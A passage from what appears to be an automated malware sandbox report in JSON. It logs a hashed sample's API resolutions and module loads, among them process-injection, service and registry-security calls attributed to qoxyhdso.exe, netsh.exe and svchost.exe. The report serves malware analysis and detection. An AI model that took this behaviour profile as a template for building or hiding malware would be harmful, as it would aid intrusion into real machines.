called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005964)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005964)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002296)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002296)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006024)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006024)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004312)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004312)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00004252)\n \"qoxyhdso.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalW (UID: 00000000-00004252)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitHelperDll (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CryptEnumProvidersW (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerW (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenServiceW (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceConfigW (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatus (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpInitialize (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegisterGPNotification (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter UnregisterGPNotification (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetHashInterface (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCipherInterface (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadUILanguage (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00003080)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpTerminate (UID: 00000000-00003080)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalA (UID: 00000000-00003960)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter DnsQuery_A (UID: 00000000-00003960)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"GDI32.DLL\" at base 758f0000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 772c0000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70460000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"KERNEL32\" at base 772e0000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a260000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"KERNEL32.DLL\" at base 772e0000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"WS2_32.DLL\" at base 76c70000\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"DBGHELP.DLL\" at base 